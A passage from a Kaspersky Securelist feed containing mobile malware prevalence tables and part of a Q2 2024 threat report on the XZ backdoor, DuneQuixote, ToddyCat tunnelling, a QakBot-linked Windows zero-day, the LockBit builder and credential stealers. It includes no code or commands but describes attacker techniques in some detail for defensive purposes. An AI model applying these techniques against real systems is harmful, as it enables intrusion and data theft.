ranking</strong></td></tr><tr><td>DangerousObject.Multi.Generic</td><td>9.82</td><td>11.44</td><td>+1.61</td><td>+1</td></tr><tr><td>DangerousObject.AndroidOS.GenericML</td><td>3.83</td><td>7.56</td><td>+3.72</td><td>+6</td></tr><tr><td>Trojan.AndroidOS.Triada.ga</td><td>5.66</td><td>6.66</td><td>+1.00</td><td>+2</td></tr><tr><td>Trojan.AndroidOS.Fakemoney.v</td><td>8.60</td><td>6.60</td><td>-2.00</td><td>-1</td></tr><tr><td>Trojan.AndroidOS.Boogr.gsh</td><td>6.62</td><td>6.01</td><td>-0.61</td><td>-1</td></tr><tr><td>Trojan.AndroidOS.Triada.fd</td><td>10.38</td><td>5.89</td><td>-4.49</td><td>-5</td></tr><tr><td>Trojan.AndroidOS.Triada.gm</td><td>0.00</td><td>5.16</td><td>+5.16</td><td></td></tr><tr><td>Trojan-Downloader.AndroidOS.Dwphon.a</td><td>5.26</td><td>2.71</td><td>-2.55</td><td>-2</td></tr><tr><td>Trojan.AndroidOS.Generic</td><td>2.08</td><td>2.59</td><td>+0.51</td><td>+5</td></tr><tr><td>Trojan.AndroidOS.Triada.gn</td><td>0.00</td><td>2.23</td><td>+2.23</td><td></td></tr><tr><td>Trojan-Spy.AndroidOS.SpyNote.bz</td><td>3.52</td><td>1.97</td><td>-1.55</td><td>-2</td></tr><tr><td>Trojan-Dropper.AndroidOS.Agent.sm</td><td>2.09</td><td>1.75</td><td>-0.34</td><td>+1</td></tr><tr><td>Trojan.AndroidOS.Triada.gb</td><td>1.34</td><td>1.72</td><td>+0.37</td><td>+11</td></tr><tr><td>Trojan.AndroidOS.Fakemoney.bj</td><td>4.26</td><td>1.47</td><td>-2.79</td><td>-7</td></tr><tr><td>Trojan-Dropper.AndroidOS.Badpack.g</td><td>1.87</td><td>1.40</td><td>-0.47</td><td>+1</td></tr><tr><td>Trojan.AndroidOS.Triada.ex</td><td>2.42</td><td>1.37</td><td>-1.05</td><td>-5</td></tr><tr><td>Trojan-Banker.AndroidOS.Mamont.aq</td><td>0.00</td><td>1.36</td><td>+1.36</td><td></td></tr><tr><td>Trojan-Downloader.AndroidOS.Agent.ms</td><td>1.39</td><td>1.34</td><td>-0.05</td><td>+5</td></tr><tr><td>Trojan.AndroidOS.Triada.gh</td><td>0.00</td><td>1.31</td><td>+1.31</td><td></td></tr><tr><td>Trojan-Downloader.AndroidOS.Agent.mm</td><td>2.12</td><td>1.29</td><td>-0.83</td><td>-8</td></tr></tbody></table><p>The generalized cloud verdict DangerousObject.Multi.Generic returned to the top spot, and the cloud AI-delivered verdict DangerousObject.AndroidOS.GenericML also moved up. Also placing highly again were the Fakemoney Trojan, which scams users out of personal data with a promise of easy cash, the pre-installed Dwphon Trojan and modified versions of WhatsApp with built-in Triada modules. The latter include Trojan-Downloader.AndroidOS.Agent.ms.</p><p>The Mamont banking Trojan, which steals money by scanning text messages, saw quite a jump in its popularity.</p><h2 id="region-specific-malware">Region-specific malware</h2><p>This section describes malware whose activity is concentrated in specific countries.</p><table width="100%"><tbody><tr><td width="40%"><strong>Verdict</strong></td><td width="30%"><strong>Country*</strong></td><td width="30%"><strong>%**</strong></td></tr><tr><td>Backdoor.AndroidOS.Tambir.a</td><td>Turkey</td><td>99.51</td></tr><tr><td>Trojan-Banker.AndroidOS.BrowBot.q</td><td>Turkey</td><td>99.30</td></tr><tr><td>Trojan-Banker.AndroidOS.BrowBot.a</td><td>Turkey</td><td>98.88</td></tr><tr><td>Backdoor.AndroidOS.Tambir.d</td><td>Turkey</td><td>98.24</td></tr><tr><td>Trojan-Banker.AndroidOS.Rewardsteal.dn</td><td>India</td><td>98.18</td></tr><tr><td>Trojan-Banker.AndroidOS.UdangaSteal.k</td><td>India</td><td>97.44</td></tr><tr><td>HackTool.AndroidOS.FakePay.c</td><td>Brazil</td><td>97.43</td></tr><tr><td>Trojan-Banker.AndroidOS.Rewardsteal.c</td><td>India</td><td>97.03</td></tr><tr><td>Trojan-Banker.AndroidOS.Agent.ox</td><td>India</td><td>96.97</td></tr><tr><td>Trojan-Spy.AndroidOS.SmsThief.wk</td><td>India</td><td>96.92</td></tr><tr><td>Trojan-Banker.AndroidOS.Rewardsteal.n</td><td>India</td><td>96.74</td></tr><tr><td>Trojan-Banker.AndroidOS.UdangaSteal.f</td><td>Indonesia</td><td>96.40</td></tr><tr><td>Backdoor.AndroidOS.Tambir.b</td><td>Turkey</td><td>96.20</td></tr><tr><td>Trojan-Dropper.AndroidOS.Hqwar.hc</td><td>Turkey</td><td>96.19</td></tr><tr><td>Trojan-Banker.AndroidOS.Agent.pp</td><td>India</td><td>95.97</td></tr><tr><td>Trojan-Banker.AndroidOS.UdangaSteal.b</td><td>Indonesia</td><td>95.23</td></tr><tr><td>Trojan-Dropper.AndroidOS.Agent.sm</td><td>Turkey</td><td>95.11</td></tr><tr><td>Trojan-SMS.AndroidOS.EvilInst.f</td><td>Thailand</td><td>95.05</td></tr><tr><td>Trojan-SMS.AndroidOS.EvilInst.b</td><td>Thailand</td><td>94.64</td></tr><tr><td>Trojan-Spy.AndroidOS.SmsThief.vb</td><td>Indonesia</td><td>94.57</td></tr><tr><td>Trojan-Banker.AndroidOS.Coper.b</td><td>Turkey</td><td>94.31</td></tr></tbody></table><p><em>*Country where the malware was most active.</em><br /><em>**Unique users who encountered this Trojan modification in the given country as a percentage of all users of Kaspersky mobile solutions targeted by this modification.</em></p><p>Users in Turkey continue to face banking Trojan attacks. At the same time, the list of malware active in the country remains unchanged: the VNC backdoor Tambir, the text message-stealing Trojan BrowBot and Hqwar banking Trojan packers were already mentioned in a <a href="https://securelist.com/it-threat-evolution-q1-2024-mobile-statistics/112750/" target="_blank" rel="noopener">past report</a>.</p><p>Indonesia still has the largest concentration of UdangaSteal Trojans for stealing text messages. These are often sent to victims under the guise of wedding invitations. Similar to the last quarter, the payment-simulating app FakePay was widespread in Brazil, while users in Thailand ran into the EvilInst Trojan, which sends paid text messages.</p><p>A large number of families centered in India made it to the top. Rewardsteal snatches banking data under the pretense of a money giveaway; SmsThief.wk and Agent.ox steal text messages.</p><h2 id="mobile-banking-trojans">Mobile banking Trojans</h2><p>The number of new unique installation packages for banking Trojans remains at the same level for the third quarter straight.</p><div class="js-infogram-embed" data-id="_/3Vl3pyyuAzTSpGhidB5i" data-type="interactive" data-title="05 EN-RU-ES q2-malware-report-MOBILE-STAT-data" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of installation packages for mobile banking Trojans detected by Kaspersky, Q2 2023 – Q2 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02155813/it_threat_evolution_q2_2024_mobile_statistics_en_05.png" target="_blank" rel="noopener">download</a>)</em></p><p>The total number of Trojan-Banker attacks is still on the rise, meaning that each new banking Trojan released by threat actors is increasingly used in attacks.</p><p>TOP 10 mobile bankers</p><table width="100%"><tbody><tr><td width="40%"><strong>Verdict</strong></td><td width="15%"><strong>Prev %</strong></td><td width="15%"><strong>New %</strong></td><td width="15%"><strong>Difference in p.p.</strong></td><td width="15%"><strong>Change in ranking</strong></td></tr><tr><td>Trojan-Banker.AndroidOS.Mamont.aq</td><td>0.00</td><td>14.13</td><td>+14.13</td><td></td></tr><tr><td>Trojan-Banker.AndroidOS.UdangaSteal.b</td><td>7.00</td><td>10.10</td><td>+3.10</td><td>+3</td></tr><tr><td>Trojan-Banker.AndroidOS.Bian.h</td><td>10.21</td><td>7.46</td><td>-2.76</td><td>0</td></tr><tr><td>Trojan-Banker.AndroidOS.GodFather.m</td><td>0.97</td><td>6.41</td><td>+5.44</td><td>+20</td></tr><tr><td>Trojan-Banker.AndroidOS.Faketoken.z</td><td>1.39</td><td>5.17</td><td>+3.79</td><td>+14</td></tr><tr><td>Trojan-Banker.AndroidOS.Mamont.am</td><td>0.00</td><td>5.12</td><td>+5.12</td><td></td></tr><tr><td>Trojan-Banker.AndroidOS.Mamont.o</td><td>4.58</td><td>5.00</td><td>+0.42</td><td>-1</td></tr><tr><td>Trojan-Banker.AndroidOS.Agent.pp</td><td>0.00</td><td>4.59</td><td>+4.59</td><td></td></tr><tr><td>Trojan-Banker.AndroidOS.Agent.eq</td><td>13.39</td><td>4.51</td><td>-8.88</td><td>-8</td></tr><tr><td>Trojan-Banker.AndroidOS.Svpeng.aj</td><td>0.95</td><td>3.74</td><td>+2.79</td><td>+15</td></tr></tbody></table><h2 id="mobile-ransomware-trojans">Mobile ransomware Trojans</h2><p>The number of ransomware installation packages decreased compared to Q1 2024 to roughly the same level as a year ago.</p><div class="js-infogram-embed" data-id="_/oobs9b7A5yG9sNk7eb0o" data-type="interactive" data-title="06 EN-RU-ES q2-malware-report-MOBILE-STAT-data" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of installation packages for mobile ransomware Trojans detected by Kaspersky, Q2 2023 – Q2 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02160218/it_threat_evolution_q2_2024_mobile_statistics_en_06.png" target="_blank" rel="noopener">download</a>)</em></p><p>In the distribution of attacks, Rasket and Rkor ransomware dropped out of the top, and Pigetrl also fell. Other top-ranking families became markedly more active, not only percentage-wise, but in terms of absolute numbers.</p><table width="100%"><tbody><tr><td width="40%"><strong>Verdict</strong></td><td width="15%"><strong>Prev %</strong></td><td width="15%"><strong>New %</strong></td><td width="15%"><strong>Difference in p.p.</strong></td><td width="15%"><strong>Change in ranking</strong></td></tr><tr><td>Trojan-Ransom.AndroidOS.Svpeng.ac</td><td>11.17</td><td>52.56</td><td>+41.39</td><td>+3</td></tr><tr><td>Trojan-Ransom.AndroidOS.Congur.cw</td><td>10.96</td><td>52.41</td><td>+41.45</td><td>+3</td></tr><tr><td>Trojan-Ransom.AndroidOS.Small.cj</td><td>10.49</td><td>49.76</td><td>+39.26</td><td>+3</td></tr><tr><td>Trojan-Ransom.AndroidOS.Congur.ap</td><td>6.66</td><td>41.52</td><td>+34.86</td><td>+3</td></tr><tr><td>Trojan-Ransom.AndroidOS.Svpeng.ah</td><td>6.03</td><td>35.62</td><td>+29.59</td><td>+4</td></tr><tr><td>Trojan-Ransom.AndroidOS.Congur.bf</td><td>4.15</td><td>32.98</td><td>+28.83</td><td>+5</td></tr><tr><td>Trojan-Ransom.AndroidOS.Svpeng.snt</td><td>5.72</td><td>25.72</td><td>+20.00</td><td>+3</td></tr><tr><td>Trojan-Ransom.AndroidOS.Svpeng.ad</td><td>3.42</td><td>24.79</td><td>+21.37</td><td>+4</td></tr><tr><td>Trojan-Ransom.AndroidOS.Svpeng.ab</td><td>3.32</td><td>24.60</td><td>+21.28</td><td>+5</td></tr><tr><td>Trojan-Ransom.AndroidOS.Pigetrl.a</td><td>15.56</td><td>12.70</td><td>-2.86</td><td>-8</td></tr></tbody></table>]]></content:encoded> <wfw:commentRss>https://securelist.com/it-threat-evolution-q2-2024-mobile-statistics/113678/feed/</wfw:commentRss> <slash:comments>0</slash:comments> <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured.jpg" width="1376" height="864"><media:keywords>full</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured-300x188.jpg" width="300" height="188"><media:keywords>medium</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content> </item> <item> <title>IT threat evolution Q2 2024</title> <link>https://securelist.com/it-threat-evolution-q2-2024/113669/</link> <comments>https://securelist.com/it-threat-evolution-q2-2024/113669/#respond</comments> <dc:creator><![CDATA[David Emm]]></dc:creator> <pubDate>Tue, 03 Sep 2024 08:00:08 +0000</pubDate> <category><![CDATA[Malware reports]]></category> <category><![CDATA[BitLocker]]></category> <category><![CDATA[DuneQuixote]]></category> <category><![CDATA[Linux]]></category> <category><![CDATA[LockBit]]></category> <category><![CDATA[Malware]]></category> <category><![CDATA[Malware Descriptions]]></category> <category><![CDATA[Malware Technologies]]></category> <category><![CDATA[QakBot]]></category> <category><![CDATA[Ransomware]]></category> <category><![CDATA[ToddyCat]]></category> <category><![CDATA[XZ]]></category><category><![CDATA[Unix and macOS malware]]></category> <category><![CDATA[Windows malware]]></category> <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=113669</guid> <description><![CDATA[In this report, Kaspersky researchers explore the most significant attacks of Q2 2024 that used a XZ backdoor, the LockBit builder, ShrinkLocker ransomware, etc.]]></description> <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="targeted-attacks">Targeted attacks</h2><h3 id="xz-backdoor-a-supply-chain-attack-in-the-making">XZ backdoor: a supply chain attack in the making</h3><p>On March 29, a <a href="https://www.openwall.com/lists/oss-security/2024/03/29/4" target="_blank" rel="noopener">message</a> on the Openwall oss-security mailing list announced the discovery of a backdoor in XZ, a compression utility included in many popular Linux distributions. The backdoored library is used by the OpenSSH server process <em>sshd</em>. On a number of <em>systemd</em>-based distributions, including Ubuntu, Debian and RedHat/Fedora Linux, OpenSSH is patched to use <em>systemd</em> features and is therefore dependent on the library (Arch Linux and Gentoo are not affected). The code was inserted in February and March 2024, mostly by Jia Cheong Tan – probably a fictitious identity. We suspect that the goal of the attack was to introduce exclusive remote code execution capabilities into the <em>sshd</em> process by targeting the XZ build process; and then to push the backdoored code out to major Linux distributions as a part of a large-scale supply chain attack.</p><h4 id="timeline-of-events">Timeline of events</h4><p>2024.01.19 XZ website moved to GitHub pages by new maintainer (jiaT75)<br />2024.02.15 “build-to-host.m4” is added to .gitignore<br />2024.02.23 two “test files” containing the stages of the malicious script are introduced<br />2024.02.24 XZ 5.6.0 is released<br />2024.02.26 commit in CMakeLists.txt that sabotages the Landlock security feature<br />2024.03.04 the backdoor leads to issues with Valgrind<br />2024.03.09 two “test files” are updated, CRC functions are modified, Valgrind issue is “fixed”<br />2024.03.09 XZ 5.6.1 is released<br />2024.03.28 bug is discovered, Debian and RedHat notified<br />2024.03.28 Debian rolls back XZ 5.6.1 to version 5.4.5-0.2<br />2024.03.29 an email is published on the oss-security mailing list<br />2024.03.29 RedHat confirms backdoored XZ was shipped in Fedora Rawhide and Fedora Linux 40 beta<br />2024.03.30 Debian shuts down builds and starts process to rebuild them<br />2024.04.02 XZ main developer acknowledges backdoor incident</p><p>While earlier supply chain attacks we have seen in Node.js, <a href="https://securelist.com/two-more-malicious-python-packages-in-the-pypi/107218/" target="_blank" rel="noopener">PyPI</a>, <a href="https://social.librem.one/@eighthave/112194828562355097" target="_blank" rel="noopener">FDroid</a>, and the Linux <a href="https://lore.kernel.org/lkml/20210421130105.1226686-1-gregkh@linuxfoundation.org/" target="_blank" rel="noopener">kernel</a> consisted mostly of atomic malicious patches, fake packages and typo-squatted package names, this incident was a multi-stage operation that came close to compromising SSH servers on a global scale.</p><p>The backdoor in the <em>liblzma</em> library was introduced at two levels. The source code of the build infrastructure that generated the final packages was modified slightly (by introducing an additional file <em>build-to-host.m4</em>) to extract the next stage script hidden in a test-case file (<em>bad-3-corrupt_lzma2.xz</em>). This script, in turn, extracted a malicious binary component from another test-case file (<em>good-large_compressed.lzma</em>) that was linked to the legitimate library during the compilation process to be shipped to Linux repositories. Major vendors in turn shipped the malicious component in beta and experimental builds. The XZ compromise was assigned the identifier <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-3094" target="_blank" rel="noopener">CVE-2024-3094</a> and the maximum severity level of 10.</p><p>The attackers’ initial goal was to hook one of the functions related to RSA key manipulation. In our analysis of the hook process, we focused on the behavior of the backdoor inside OpenSSH, specifically <a href="https://www.openssh.com/portable.html" target="_blank" rel="noopener">OpenSSH portable</a> version 9.7p1 (the latest version). Our analysis revealed a number of interesting details about the backdoor’s functionality.</p><ul><li>The attacker set an anti-replay feature to prevent possible capture or hijacking of the backdoor communications.</li><li>The author used a custom steganography technique in the x86 code to hide the public key.</li><li>The backdoor hooks the logging function to hide its logs of unauthorized connections to the SSH server.</li><li>The backdoor hooks the password authentication function to allow the attacker to use any username/password to log in to the infected server without any further verification. It does the same with public key authentication.</li><li>The backdoor has remote code execution capabilities that allow the attacker to execute any system command on the infected server.</li></ul><p>It’s clear that this is a highly sophisticated threat. The attackers used social engineering to gain long-term access to the development environment and extended it with fake human interactions in plain sight. They have extensive knowledge of the internals of open-source projects such as SSH and <em>libc</em>, as well as expertise in code/script obfuscation used to initiate the infection process. A number of things make this threat unique, including the way the public key information is embedded in the binary code itself, complicating the recovery process, and the meticulous preparation of the operation.</p><p>Kaspersky products detect malicious objects associated with the attack as HEUR:Trojan.Script.XZ and Trojan.Shell.XZ. In addition, Kaspersky Endpoint Security for Linux detects malicious code in <em>sshd</em> process memory as MEM:Trojan.Linux.XZ (as part of the Critical Areas Scan task).</p><p>For more information, read our <a href="https://securelist.com/xz-backdoor-story-part-1/112354/" target="_blank" rel="noopener">initial analysis</a>, <a href="https://securelist.com/xz-backdoor-story-part-2-social-engineering/112476/" target="_blank" rel="noopener">incident assessment</a> and <a href="https://securelist.com/xz-backdoor-part-3-hooking-ssh/113007/" target="_blank" rel="noopener">in-depth hook analysis</a>.</p><h3 id="dunequixote-campaign-targeting-the-middle-east">DuneQuixote campaign targeting the Middle East</h3><p>In February, we discovered a <a href="https://securelist.com/dunequixote/112425/" target="_blank" rel="noopener">new malware campaign</a> targeting government entities in the Middle East that we dubbed DuneQuixote. Our investigation uncovered more than 30 DuneQuixote dropper samples being actively used in this campaign. Some were regular droppers, while others were manipulated installer files for a legitimate tool called Total Commander. The droppers carried malicious code to download a backdoor that we dubbed CR4T. While we have only identified two of these implants, we strongly believe that there may be more in the form of completely different malware. The group behind the campaign took steps to prevent collection and analysis of its implants and implemented practical and well-designed evasion techniques in both network communications and the malware code.</p><p>The initial dropper is a Windows x64 executable file, written in C/C++, although there are DLL versions of the malware that provide the same functionality. Upon execution, the malware initiates a series of decoy API calls that serve no practical purpose. These calls are primarily string comparison functions that are executed without any conditional jumps based on the comparison results. The strings specified in these functions are snippets of Spanish poetry. These vary from one sample to the next, changing the signature of each sample to evade traditional detection methods.</p><p>The primary goal of the CR4T implant is to give attackers access to a console for command line execution on the infected computer. It also facilitates the download, upload and modification of files.</p><p>We also discovered a Golang version of the CR4T implant that has similar capabilities to the C version. A notable difference of this version is the ability to create scheduled tasks using the Golang <a href="https://github.com/go-ole/go-ole" target="_blank" rel="noopener">Go-ole</a> library, which uses Windows Component Object Model (COM) object interfaces to interact with the Task Scheduler service.</p><p>Through the use of memory-only implants and droppers masquerading as legitimate software that mimics the Total Commander installer, the attackers demonstrate above-average evasion capabilities and techniques. The discovery of both C/C++ and Golang versions of the CR4T implant highlights the adaptability and ingenuity of the threat actor behind this campaign.</p><h3 id="toddycat-punching-holes-in-your-infrastructure">ToddyCat: punching holes in your infrastructure</h3><p>The threat actor ToddyCat predominantly targets government organizations in the Asia-Pacific region, primarily to steal sensitive data. In our <a href="https://securelist.com/toddycat-keep-calm-and-check-logs/110696/" target="_blank" rel="noopener">previous article</a>, we described the tools the attackers use to collect and exfiltrate files (LoFiSe and PcExter). <a href="https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/" target="_blank" rel="noopener">More recently</a>, we examined how this threat actor maintains constant access to compromised infrastructure, the information they are interested in and the tools they use to extract it.</p><p>Our investigation revealed that ToddyCat was stealing data on an industrial scale. To steal large volumes of data, attackers need to automate the data harvesting process as much as possible, and provide several alternative means to continuously access and monitor the systems they attack.</p><p>ToddyCat used several methods to accomplish this. One was to create a reverse SSH tunnel. They launched this using the SSH client from the OpenSSH for Windows toolkit, along with the library required to run it, an OPENSSH private key file, and a script, <em>a.bat</em>, to hide the private key file. The attackers transferred files to the target host via SMB using shared folders.</p><p>The threat actor also made use of the server utility (VPN Server) from the SoftEther VPN package for tunneling. This package is an open-source solution developed as part of academic research at the University of Tsukuba, which allows the creation of VPN connections using a variety of popular protocols, such as L2TP/IPsec, OpenVPN, MS-SSTP, L2TPv3, EtherIP and others.</p><p>Another way ToddyCat accessed remote infrastructure was by tunneling to a legitimate cloud provider: an application running on the user’s host with access to the local infrastructure can connect to the cloud through a legitimate agent and redirect traffic or execute specific commands.</p><p><a href="https://ngrok.com/docs/agent/" target="_blank" rel="noopener">Ngrok</a> is a lightweight agent that can redirect traffic from endpoints to cloud infrastructure and vice versa. The attackers installed Ngrok on target hosts and used it to redirect command and control (C2) traffic from the cloud infrastructure to a specific port on those hosts.</p><p>They also used Krong, a proxy that uses XOR to encrypt the data passing through it, thereby concealing the content of the traffic to avoid detection.</p><p>After creating tunnels on the target hosts using OpenSSH or SoftEther VPN, the threat actor also installed the <a href="https://github.com/fatedier/frp" target="_blank" rel="noopener">FRP client</a>, a fast reverse proxy written in Go that allows access from the internet to a local server behind a NAT or firewall.</p><p>ToddyCat used various tools to collect data. They used one of the tools, which we named “cuthead” (the name came from the file description field of the sample we found), to search for documents. They used “WAExp”, a WhatsApp data stealer, to search for and collect browser local storage files containing data from the web version of WhatsApp. The attackers also used a tool called “TomBerBil” to steal passwords from browsers.</p><p>To protect against such attacks, we recommend that organizations add the resources and IP addresses of cloud services that provide traffic tunneling to the corporate firewall denylist. We also recommend limiting the range of tools administrators can use to remotely access hosts: other tools should either be prohibited or closely monitored as possible indicators of suspicious activity. In addition, employees should avoid storing passwords in browsers, as this helps attackers gain access to sensitive information. Moreover, reusing passwords across services increases the amount of data available to attackers.</p><h2 id="other-malware">Other malware</h2><h3 id="qakbot-attacks-with-windows-zero-day">QakBot attacks with Windows zero-day</h3><p>In early April we investigated the Windows DWM (Desktop Window Manager) Core Library Elevation of Privilege Vulnerability (<a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-36033" target="_blank" rel="noopener">CVE-2023-36033</a>), which was previously discovered as a zero-day being exploited in the wild. While searching for samples related to this exploit and attacks using it, we found a curious document uploaded to VirusTotal on April 1. This document caught our attention because it had a descriptive file name indicating that it contained information about a Windows vulnerability.</p><p>Inside we found a brief description of a Windows DWM vulnerability and how it could be exploited to gain system privileges – all written in very poor English. The exploitation process described in this document was identical to that used in the previously mentioned zero-day exploit for CVE-2023-36033 – but the vulnerability was different.</p><p>The poor quality of the writing, and the fact the document was missing some important details about how to actually trigger the vulnerability, suggested that the vulnerability described was completely made up or was present in code that could not be accessed or controlled by attackers.</p><p>However, a quick check revealed that this was a real zero-day vulnerability that could be used to escalate privileges, so we immediately reported our findings to Microsoft. The vulnerability was assigned <a href="https://securelist.com/cve-2024-30051/112618/" target="_blank" rel="noopener">CVE-2024-30051</a> and a patch was released as part of Patch Tuesday on May 14.</p><p>We also began closely monitoring our statistics for exploits and attacks using this zero-day, and in mid-April we discovered an exploit. We have seen this zero-day used in conjunction with <a href="https://securelist.com/?s=QakBot" target="_blank" rel="noopener">QakBot</a> and other malware, and believe that multiple threat actors have access to it.</p><p>Kaspersky products detect the exploitation of CVE-2024-30051 and related malware with the following verdicts:</p><ul><li>PDM:Exploit.Win32.Generic;</li><li>PDM:Trojan.Win32.Generic.</li></ul><h3 id="using-the-lockbit-builder-to-generate-targeted-ransomware">Using the LockBit builder to generate targeted ransomware</h3><p>Last year, we published our <a href="https://securelist.com/lockbit-ransomware-builder-analysis/110370/" target="_blank" rel="noopener">research on the LockBit 3.0 builder</a>. Leaked in 2022, this builder greatly simplified the creation of custom ransomware.</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184325/it_threat_evolution_q2_2024_01.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-113672" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184325/it_threat_evolution_q2_2024_01.png" alt="" width="920" height="393" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184325/it_threat_evolution_q2_2024_01.png 920w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184325/it_threat_evolution_q2_2024_01-300x128.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184325/it_threat_evolution_q2_2024_01-768x328.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184325/it_threat_evolution_q2_2024_01-819x350.png 819w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184325/it_threat_evolution_q2_2024_01-740x316.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184325/it_threat_evolution_q2_2024_01-655x280.png 655w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184325/it_threat_evolution_q2_2024_01-800x342.png 800w" sizes="(max-width: 920px) 100vw, 920px" /></a></p><p>The <em>keygen.exe</em> file generates public and private keys used for encryption and decryption. The <em>builder.exe</em> file generates the variant according to the options set in the <em>config.json</em> file. The whole process is automated by the <em>build.bat</em> script.</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184648/it_threat_evolution_q2_2024_02.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-113673" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184648/it_threat_evolution_q2_2024_02-1024x508.png" alt="" width="1024" height="508" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184648/it_threat_evolution_q2_2024_02-1024x508.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184648/it_threat_evolution_q2_2024_02-300x149.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184648/it_threat_evolution_q2_2024_02-768x381.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184648/it_threat_evolution_q2_2024_02-706x350.png 706w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184648/it_threat_evolution_q2_2024_02-740x367.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184648/it_threat_evolution_q2_2024_02-565x280.png 565w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184648/it_threat_evolution_q2_2024_02-800x397.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184648/it_threat_evolution_q2_2024_02.png 1382w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p><p>The builder also allows attackers to choose exactly what they want to encrypt. If they know enough about the target’s infrastructure, they can create malware tailored to the specific configuration of the target’s network architecture, such as important files, administrative accounts and critical systems.</p><p>This has allowed attackers to generate customized versions of this threat to suit their needs, making their attacks more effective.</p><p>In February, the international law enforcement task force <a href="https://www.weforum.org/agenda/2024/02/lockbit-ransomware-operation-cronos-cybercrime/" target="_blank" rel="noopener">Operation Cronos</a> gained insight into LockBit’s operations after taking down the group. The operation involved law enforcement agencies from 10 countries. They were able to seize the group’s infrastructure, obtain private decryption keys and create a <a href="https://www.nomoreransom.org/es/decryption-tools.html#Lockbit30" target="_blank" rel="noopener">decryption toolset</a> based on a list of known victim IDs obtained by the authorities. However, just a few days later, the ransomware group <a href="https://www.scmagazine.com/news/lockbit-returns-after-takedown-with-new-extortion-threats" target="_blank" rel="noopener">announced</a> that it was back in action.</p><p>In a recent incident response engagement, we were faced with a ransomware attack that involved a ransomware sample created with the same leaked builder. The attackers were able to find the admin credentials in plain text. They created a custom version of the ransomware that used the account credentials to spread across the network and perform malicious activities, such as killing Windows Defender and deleting Windows Event Logs to encrypt data and cover its tracks. In <a href="https://securelist.com/lockbit-3-0-based-custom-targeted-ransomware/112375/" target="_blank" rel="noopener">one of our latest articles</a>, we revisited the LockBit 3.0 builder files and analyzed the steps the attackers took to compromise the network.</p><h3 id="stealers-stealers-and-more-stealers">Stealers, stealers and more stealers</h3><p>Stealers are a prominent feature of the threat landscape. They are designed to harvest passwords and other sensitive data from infected computers that can then be used in other attacks, resulting in financial loss to the target. Over the past year we have published a number of public and private reports on newly discovered stealers. We recently wrote <a href="https://securelist.com/crimeware-report-stealers/112633/" target="_blank" rel="noopener">reports on Acrid, ScarletStealer and Sys01</a>: the first two are new, the latter has been updated.</p><p>Acrid, a new stealer discovered in December 2023, is written in C++ for the 32-bit system, despite the fact that most systems are now 64-bit. Upon closer inspection, it became apparent that the authors had compiled it for a 32-bit environment in order to use the “Heaven’s Gate” technique, which allows 32-bit applications to access the 64-bit space to bypass certain security controls. This malware is designed to steal browser data, local cryptocurrency wallets, files with specific names (<em>wallet.dat</em>, <em>password.docx</em>, etc.) and credentials from installed applications (FTP managers, messengers, etc.). The collected data are zipped and sent to the C2.</p><p>Last January, we analyzed a downloader we dubbed “Penguish”. One of the payloads it downloaded was a previously unknown stealer called “ScarletStealer” – an odd stealer, since most of its functionality is contained in other binaries (applications and Chrome extensions) that it downloads. When ScarletStealer is executed, it checks for the presence of cryptocurrencies and crypto wallets by looking for certain folder paths (e.g., %APPDATA%\Roaming\Exodus). If anything is detected, it starts downloading the additional executables using PowerShell. Most ScarletStealer executables are digitally signed. This stealer is very 